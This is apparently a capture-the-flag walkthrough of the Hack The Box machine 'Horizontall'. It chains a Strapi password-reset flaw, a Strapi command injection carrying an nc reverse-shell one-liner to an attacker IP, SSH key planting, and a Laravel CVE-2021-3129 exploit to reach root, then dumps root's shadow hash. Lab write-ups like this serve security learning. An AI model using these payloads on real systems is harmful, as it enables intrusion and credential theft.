Hack-The-Box-walkthrough[horizontall]

Posted on Edited on In Views: Word count in article: 1.3k Reading time ≈ 5 mins.

introduce

OS: Linux
Difficulty: Easy
Points: 20
Release: 28 Aug 2021
IP: 10.10.11.105

  • my htb rank

Enumeration

Nmap

1
2
3
4
5
6
┌──(root💀kali)-[~/hackthebox/machine/horizontall]
└─# nmap -sV -v -p- --min-rate=10000 10.10.11.105
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    nginx 1.14.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

added horizontall.htb to our hosts file. You need to add it to enum further.

Webserver

We don’t have any intresting thing, so we fuzz for vhost and we get a hit on api-prod.horizontall.htb . So, we also add this to our host file.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
┌──(root💀kali)-[~/hackthebox/machine/horizontall]
└─# gobuster vhost -u horizontall.htb -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt --threads 50         
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:          http://horizontall.htb
[+] Method:       GET
[+] Threads:      50
[+] Wordlist:     /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt
[+] User Agent:   gobuster/3.1.0
[+] Timeout:      10s
===============================================================
2021/08/30 03:18:39 Starting gobuster in VHOST enumeration mode
===============================================================
Found: api-prod.horizontall.htb (Status: 200) [Size: 413]

api-prod.horizontall.htb

We fuzz for sub directories and we have admin.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
┌──(root💀kali)-[~/ffuf]
└─# ./ffuf -w /usr/share/seclists/Discovery/Web-Content/raft-small-words.txt -u http://api-prod.horizontall.htb/FUZZ

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v1.1.0-git
________________________________________________

 :: Method           : GET
 :: URL              : http://api-prod.horizontall.htb/FUZZ
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/Web-Content/raft-small-words.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403
________________________________________________

admin                   [Status: 200, Size: 854, Words: 98, Lines: 17]
Admin                   [Status: 200, Size: 854, Words: 98, Lines: 17]
users                   [Status: 403, Size: 60, Words: 1, Lines: 1]
reviews                 [Status: 200, Size: 507, Words: 21, Lines: 1]
.                       [Status: 200, Size: 413, Words: 76, Lines: 20]
ADMIN                   [Status: 200, Size: 854, Words: 98, Lines: 17]
Users                   [Status: 403, Size: 60, Words: 1, Lines: 1]
Reviews                 [Status: 200, Size: 507, Words: 21, Lines: 1]

Strapi Abuse

We have strapi running in this api-prod.horizontall.htb.

1
http://api-prod.horizontall.htb/admin/auth/login

There is a password reset vulnerability (CVE-2019-18818), so we abuse it.

https://thatsn0tmysite.wordpress.com/2019/11/15/x05/

Password reset

We can easily guess the email of admin.

1
2
3
┌──(root💀kali)-[~/hackthebox/machine/horizontall]
└─# curl http://api-prod.horizontall.htb/admin/strapiVersion
{"strapiVersion":"3.0.0-beta.17.4"}

The issue was apparently already fixed (gotta love that opensource-quickness) in version beta-17.5 so the target version is exploitable.

1
2
3
4
5
6
7
┌──(root💀kali)-[~/hackthebox/machine/horizontall]
└─# python pass-reset.py admin@horizontall.htb http://api-prod.horizontall.htb password1
[*] Detected version(GET /admin/strapiVersion): 3.0.0-beta.17.4
[*] Sending password reset request...
[*] Setting new password...
[*] Response:
{"jwt":"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MywiaXNBZG1pbiI6dHJ1ZSwiaWF0IjoxNjMwMzEwMTQ0LCJleHAiOjE2MzI5MDIxNDR9.YyA-94yJeHk-7h8U8Oxl-NAvXcs9Tp3YeY7OVN3gx5g","user":{"id":3,"username":"admin","email":"admin@horizontall.htb","blocked":null}}

And we can successfully login.

Strapi RCE

There is blog post that explains about strapi exploit Strapi Framework Vulnerable to Remote Code Execution (CVE-2019-19609).

https://bittherapy.net/post/strapi-framework-remote-code-execution/

To reproduce this issue the app must be using strapi-3.0.0-beta.17.7 or earlier.

1
curl -i -s -k -X $'POST' -H $'Host: api-prod.horizontall.htb' -H $'Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MywiaXNBZG1pbiI6dHJ1ZSwiaWF0IjoxNjMwMzEwMTgzLCJleHAiOjE2MzI5MDIxODN9.5OUfoWMixghsJkKGNtiFYXNM-BbojJH4qUUwlwp1wBg' -H $'Content-Type: application/json' -H $'Origin: http://api-prod.horizontall.htb/' -H $'Content-Length: 123' -H $'Connection: close' --data $'{\"plugin\":\"documentation && $(rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.28 9001 >/tmp/f)\",\"port\":\"1337\"}' $'http://api-prod.horizontall.htb/admin/plugins/install' --proxy http://127.0.0.1:8080

I am passing the request through burp in case if there is something error. And we get a
shell back as strapi

1
2
3
4
5
6
7
8
9
10
11
POST /admin/plugins/install HTTP/1.1
Host: api-prod.horizontall.htb
User-Agent: curl/7.74.0
Accept: */*
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MywiaXNBZG1pbiI6dHJ1ZSwiaWF0IjoxNjMwMzEwMTgzLCJleHAiOjE2MzI5MDIxODN9.5OUfoWMixghsJkKGNtiFYXNM-BbojJH4qUUwlwp1wBg
Content-Type: application/json
Origin: http://api-prod.horizontall.htb/
Content-Length: 127
Connection: close

{"plugin":"documentation && $(rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.28 9001 >/tmp/f)","port":"1337"}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
┌──(root💀kali)-[~]
└─# nc -lvp 9001
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::9001
Ncat: Listening on 0.0.0.0:9001
Ncat: Connection from 10.10.11.105.
Ncat: Connection from 10.10.11.105:38344.
/bin/sh: 0: can't access tty; job control turned off
$ di
/bin/sh: 1: di: not found
$ id
uid=1001(strapi) gid=1001(strapi) groups=1001(strapi)
$ whoami
strapi
$ ls /home
developer
$ cd /home/developer
$ ls
composer-setup.php
myproject
user.txt
$ cat user.txt
28682f1ff5c4be049cac8bb83103614a

Privilege Escalation

Strapi’s home directory is in opt. So, I created a .ssh directory and added my ssh key.

1
2
3
4
5
$ pwd
/opt/strapi/.ssh
$ echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDMR1r7B7aiEe6j+wBsVumAFqFXCiqw2iSrcg1S7rC1BdlVqr8YfWnT6e/e3+TAJk9idtLz/wN2MkupWtI1ddtNTJz31RQb0WMGjq7p8Usg0uIYhQH0PTN/GmPXDhqLIPcbTnNQMcV2PnwM07eXxQH0+s9rqVO8cR2z2f35bKe3WrHNnT7NwfOoWqNJxh+V8OGgfF8LhS0E46I6co76MJAIsX24Zs9r/dY+JPOlJlS3K2Kf3xSfPAScQeWip1WYY9depVuQywk12kOUikzGNjlQ4phNba47VjfycyV34cLw0/vQcDv5hMCfaK+hoE5rBXysnVx/f3n3zRYMLomgveQUCLBYUwJPE2t0VzeeX4W9wxrAOl2Njx5TI4cEFnmlp/6lO/iK+aC6BSBRxU19jS2fUchiN9PMgLSYGzhuIxOLvvd9AlaOYPNM7a5AfjzzO+gd1fv/Mb9EIZCKibtvpHp0eomnSDcDz/b9FNpbvg6V5NBVy2VaufcRbiBDD6cTS00= root@kali" > authorized_keys
$ cat authorized_keys
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDMR1r7B7aiEe6j+wBsVumAFqFXCiqw2iSrcg1S7rC1BdlVqr8YfWnT6e/e3+TAJk9idtLz/wN2MkupWtI1ddtNTJz31RQb0WMGjq7p8Usg0uIYhQH0PTN/GmPXDhqLIPcbTnNQMcV2PnwM07eXxQH0+s9rqVO8cR2z2f35bKe3WrHNnT7NwfOoWqNJxh+V8OGgfF8LhS0E46I6co76MJAIsX24Zs9r/dY+JPOlJlS3K2Kf3xSfPAScQeWip1WYY9depVuQywk12kOUikzGNjlQ4phNba47VjfycyV34cLw0/vQcDv5hMCfaK+hoE5rBXysnVx/f3n3zRYMLomgveQUCLBYUwJPE2t0VzeeX4W9wxrAOl2Njx5TI4cEFnmlp/6lO/iK+aC6BSBRxU19jS2fUchiN9PMgLSYGzhuIxOLvvd9AlaOYPNM7a5AfjzzO+gd1fv/Mb9EIZCKibtvpHp0eomnSDcDz/b9FNpbvg6V5NBVy2VaufcRbiBDD6cTS00= root@kali
  • Laravel Exploit

There is a laravel running on port 8000, so we forward the port and exploit it locally.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
┌──(root💀kali)-[~/hackthebox/machine/horizontall]
└─# ssh -i id_rsa -L 8000:127.0.0.1:8000 strapi@10.10.11.105
The authenticity of host '10.10.11.105 (10.10.11.105)' can't be established.
ECDSA key fingerprint is SHA256:rlqcbRwBVk92jqxFV79Tws7plMRzIgEWDMc862X9ViQ.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.105' (ECDSA) to the list of known hosts.
Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-154-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Mon Aug 30 08:44:01 UTC 2021

  System load:  0.01              Processes:           200
  Usage of /:   87.6% of 4.85GB   Users logged in:     1
  Memory usage: 52%               IP address for eth0: 10.10.11.105
  Swap usage:   0%

  => / is using 87.6% of 4.85GB


0 updates can be applied immediately.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Mon Aug 30 08:36:17 2021 from 10.10.14.5
$ id
uid=1001(strapi) gid=1001(strapi) groups=1001(strapi)
$ whoami
strapi

visit:

1
http://127.0.0.1:8000/

CVE-2021-3129

https://github.com/nth347/CVE-2021-3129_exploit

1
2
3
4
5
6
7
8
9
10
11
12
┌──(root💀kali)-[~/hackthebox/machine/horizontall]
└─# python3 exploit.py http://127.0.0.1:8000 Monolog/RCE1 "id"                                                                    
[i] Trying to clear logs
[+] Logs cleared
[+] PHPGGC found. Generating payload and deploy it to the target
[+] Successfully converted logs to PHAR
[+] PHAR deserialized. Exploited

uid=0(root) gid=0(root) groups=0(root)

[i] Trying to clear logs
[+] Logs cleared

And we have RCE in Laravel, so we can get a reverse shell but I am not going to get a reverse shell, just going to read root.txt 

1
2
3
4
5
6
7
8
┌──(root💀kali)-[~/hackthebox/machine/horizontall]
└─# python3 exploit.py http://127.0.0.1:8000 Monolog/RCE1 "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.28 9001 >/tmp/f"
[i] Trying to clear logs
[+] Logs cleared
[+] PHPGGC found. Generating payload and deploy it to the target
[+] Successfully converted logs to PHAR
[i] There is no output
[i] Trying to clear logs

and we get a root shell

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
┌──(root💀kali)-[~]
└─# nc -lvp 9001                                                                                                                  
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::9001
Ncat: Listening on 0.0.0.0:9001
Ncat: Connection from 10.10.11.105.
Ncat: Connection from 10.10.11.105:42580.
/bin/sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root)
# whoami
root
# cat /root/root.txt
03187202abb3831dbbe697f3644709b6
# cat /etc/shadow | grep root
root:$6$rGxQBZV9$SbzCXDzp1MEx7xxXYuV5voXCy4k9OdyCDbyJcWuETBujfMrpfVtTXjbx82bTNlPK6Ayg8SqKMYgVlYukVOKJz1:18836:0:99999:7:::

Summary of knowledge

  • basic information gathering
  • Strapi password reset vulnerability (CVE-2019-18818)
  • Strapi Framework Remote Code Execution (CVE-2019-19609)
  • Privilege Escalation through CVE-2021-3129 exploit

Contact me

  • QQ: 1185151867
  • twitter: https://twitter.com/fdlucifer11
  • github: https://github.com/FDlucifer

I’m lUc1f3r11, a ctfer, reverse engineer, ioter, red teamer, coder, gopher, pythoner, AI lover, security reseacher, hacker, bug hunter and more……